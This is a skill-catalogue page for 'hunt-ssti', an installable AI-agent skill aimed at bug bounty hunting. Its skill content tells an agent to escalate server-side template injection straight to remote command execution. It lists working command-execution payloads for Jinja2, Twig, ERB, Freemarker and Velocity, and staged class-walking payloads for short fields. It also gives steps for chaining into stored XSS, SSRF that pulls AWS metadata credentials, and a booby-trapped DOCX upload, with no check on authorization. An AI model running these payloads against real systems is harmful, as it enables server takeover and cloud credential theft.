hunt-ssti
Hunt server-side template injection (SSTI) across Jinja2 (Flask/Django), Twig (Symfony), Freemarker (Java), ERB (Rails), Spring, Velocity, Mako, Thymeleaf, Smarty. Detection probes use double-curly and dollar-curly math expressions evaluated server-side.
Install / Use
npx skills add elementalsouls/Claude-BugHunter --skill hunt-sstiInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
CommunicationSupported Platforms
Our assessment of hunt-ssti
hunt-ssti scores 94/100 on our quality scale, 49th of 292 Communication skills we index (top 17%).
Its SKILL.md is 8.0 KB long, well organised into 8 sections with 6 code examples: a thorough specification that gives an agent plenty to work with.
With 4,669 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 2 days ago, so hunt-ssti is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
hunt-ssti compared with similar skills
All 4 of these similar skills score higher than hunt-ssti; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| hunt-ssti (this skill)by elementalsouls | 94 | 4.7k | 2d ago | SKILL.md |
| algorithmic-artby anthropics | 100 | 177.9k | 5d ago | SKILL.md |
| pptxby anthropics | 100 | 177.9k | 5d ago | SKILL.md |
| designby nextlevelbuilder | 100 | 130.2k | 7d ago | SKILL.md |
| ui-ux-pro-maxby nextlevelbuilder | 100 | 130.2k | 7d ago | SKILL.md |
Frequently asked questions
- How do I install hunt-ssti?
- Run
npx skills add elementalsouls/Claude-BugHunter --skill hunt-ssti. The install tabs above show the steps for each supported agent. - Which AI agents does hunt-ssti work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is hunt-ssti safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is hunt-ssti still maintained?
- The repository was last updated 2 days ago, so hunt-ssti is actively maintained.
Skill content
View source on GitHubname: hunt-ssti description: "Hunt server-side template injection (SSTI) across Jinja2 (Flask/Django), Twig (Symfony), Freemarker (Java), ERB (Rails), Spring, Velocity, Mako, Thymeleaf, Smarty. Detection probes use double-curly and dollar-curly math expressions evaluated server-side. Once an engine is fingerprinted, escalate to RCE via the engine-specific class-walker, callback-registrar, or Execute-utility patterns documented in disclosed reports. Detection patterns: error messages reveal engine, blank or numeric eval reveals expression mode. Targets: email templates, PDF/report generators, CMS preview features, error pages with user input. Use when hunting RCE via template rendering, when content shows engine fingerprints, when finding endpoints that compose strings with user input before render." sources: hackerone_public, cve_database, public_research report_count: 6
Autonomous Testing Priority
Escalate straight to RCE — don't stop at arithmetic detection.
Arithmetic probes ({{7*7}}→49) confirm the injection point but are not proof of impact. The real goal is OS command execution. Arithmetic detection also fails silently when the app echoes the input back (e.g. inside an HTML attribute like <input value="{{7*7}}">), producing a false negative even when injection exists.
Order of attack:
- Try Jinja2 RCE first (covers Python/Flask — the most common stack in modern web apps):
{{config.__class__.__init__.__globals__['os'].popen('id').read()}} - If the endpoint is a traditional web form, send as form-encoded body — NOT JSON:
JSON bodies are silently ignored by form-processing endpoints (Content-Type: application/x-www-form-urlencoded field={{config.__class__.__init__.__globals__['os'].popen('id').read()}}request.form['field']sees nothing). - If Jinja2 fails, try Twig (PHP/Symfony):
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} - Fall back to arithmetic detection only to fingerprint the engine when RCE payloads fail.
Proof: Command output (uid=N(user) gid=...) in the response confirms RCE. If the output appears in HTML (inside a <div> or <pre>), that still counts — the format is irrelevant, the content is the evidence.
14. SSTI — SERVER-SIDE TEMPLATE INJECTION
Easy to detect, high payout ($2K–$8K). Direct path to RCE.
Detection Payloads (try all)
{{7*7}} → 49 = Jinja2 / Twig
${7*7} → 49 = Freemarker / Velocity / Mako (all use ${...})
<%= 7*7 %> → 49 = ERB (Ruby)
*{7*7} → 49 = Spring Thymeleaf
{{7*'7'}} → 7777777 = Jinja2 (Python string repetition); 49 = Twig (numeric coercion of '7'). Differentiates Jinja2 from Twig.
RCE Payloads
Jinja2 (Python/Flask):
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
Twig (PHP/Symfony):
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
ERB (Ruby):
<%= `id` %>
Length-constrained injection fields (profile name, display name, subject)
When the injectable field caps input length (a profile-name / display-name field is often ≤30-64 chars), the full os.popen one-liner won't fit — but detection and class-enumeration still do. Confirm with the short probe, then enumerate the gadget index in stages instead of one payload:
{{ '7'*7 }} # detection, fits anywhere
{{ [].__class__.__base__.__subclasses__() }} # dump class list, pick the index for subprocess.Popen/os
{{ ''.__class__.__mro__[1].__subclasses__()[INDEX]('id',shell=True,stdout=-1).communicate() }}
The reflected sink is frequently an outbound email (the account-update / confirmation mail rendering your name), not the web page — read the email body for the evaluated output. Disclosed: reports/125980 (profile-name → Jinja2 → confirmation email, length-limited).
Where to Test
Name/bio/description fields, email templates, invoice name, PDF generators,
URL path parameters, search queries reflected in results, HTTP headers reflected
CMS / "documentation" template-editor forms (authenticated)
Some SSTI lives behind a logged-in template editor (CMS "edit template" / product-template / email-template preview). PortSwigger's "SSTI using documentation" class is this shape. Three things break a naive attempt:
-
Fingerprint BEFORE firing RCE — the engine decides the syntax. Do NOT assume Jinja2. Probe the whole matrix and read which one evaluates:
${7*7} → 49 AND #{7*7} → 49 ⇒ Freemarker (Java) ← {{7*7}} does NOTHING here {{7*7}} → 49 ⇒ Jinja2 / Twig <%= 7*7 %> → 49 ⇒ ERB (Ruby) *{7*7} → 49 ⇒ Thymeleaf (Spring)If
{{7*7}}renders literally but${7*7}→49, you are on Freemarker — stop sending{{config...}}. -
The record id is usually a QUERY param, not a body field. The editor form posts back to
POST /…/template?productId=Nwith the id in the URL. The BODY carries onlycsrf,template, and atemplate-action(preview|save). Putting the id in the body returns400 "Missing product id". So keep the id in the query string (?productId=N) AND send a form-encoded body ofcsrf=…&template=<PAYLOAD>&template-action=preview. -
Re-fetch the CSRF each time and use
previewto iterate. GET the editor page to read a freshcsrfhidden field;template-action=previewrenders your payload WITHOUT persisting (fast feedback loop). Switch totemplate-action=saveonly once the payload is right, then trigger the render (load the public page that uses the template) to fire the command.Freemarker documentation RCE (the documented
Executeutility — this IS the intended technique):<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") }Velocity equivalent:
#set($e="e");$e.getClass().forName("java.lang.Runtime")....
Related Skills & Chains
hunt-rce— SSTI is the easiest path to RCE on Python/Ruby/PHP/Java stacks because the template language already exposes the runtime. Chain primitive: Jinja2{{config.__class__.__init__.__globals__['os'].popen('id').read()}}or Freemarker<#assign x="freemarker.template.utility.Execute"?new()>${x("id")}→ unauthenticated RCE as the rendering worker. Always escalate fingerprint → class-walker → cmd exec.hunt-xss— When the template engine sandboxes the runtime (or you only get the rendered output back as HTML), the same{{7*7}}reflection often still yields stored XSS. Chain primitive: sandboxed Jinja2 SSTI without escapes → inject<script>into rendered email template → stored XSS hitting every recipient who views the message.hunt-ssrf— Template engines often expose URL fetchers/filters before they expose the runtime, giving you SSRF before RCE. Chain primitive: Twig{{ include('http://169.254.169.254/latest/meta-data/iam/security-credentials/') }}or Jinja2 withurl_for/custom filters → AWS metadata exfil → cloud creds.hunt-file-upload— Office docs, SVGs, and email templates uploaded by the user are common SSTI surfaces (the server re-renders them). Chain primitive: upload a DOCX whoseword/document.xmlcontains${T(java.lang.Runtime).getRuntime().exec("id")}to a Velocity/Freemarker-driven mail-merge → RCE.security-arsenal— Reach for the engine-specific escape payload tree: Jinja2 class-walker variants (__subclasses__()[N]index hunting), Twig_self.envregisterUndefinedFilterCallback, Freemarker?new()Execute, ERB backticks, Velocity$class.inspect, Smarty{php}...{/php}, plus the WAF-bypass variants ({{request|attr('application')|...}}, Unicode escapes,{%print(...)%}).triage-validation— Apply the Pre-Severity Gate before claiming Critical RCE. A{{7*7}} → 49reflection inside a sandboxed engine (e.g., Twig sandbox mode, Jinja2 SandboxedEnvironment with no escape) is Medium SSTI, not Critical RCE. Proveid/OOB DNS callback with a unique marker before writing the report.
Related Skills
algorithmic-art
177.9kCreating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems.
pptx
177.9kUse this skill any time a .pptx or .potx file is involved in any way — as input, output, or both. This includes: creating slide decks, pitch decks, or presentations; reading, parsing, or extracting text from any .pptx or .potx file (even if the extracted content will be used elsewhere, like in an em…
design
130.2kComprehensive design skill: brand identity, design tokens, UI styling, logo generation (55 styles, Gemini, Atlas Cloud, or MuAPI AI), corporate identity program (50 deliverables, CIP mockups), HTML presentations (Chart.js), banner design (22 styles, social/ads/web/print), icon design (15 styles, SVG…
ui-ux-pro-max
130.2kUI/UX design intelligence for web, mobile, and desktop. This skill should be used when designing, building, reviewing, or fixing interfaces, including pages, components, design systems, accessibility, interaction, responsive layout, typography, color, charts, and stack-specific UI implementation.
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
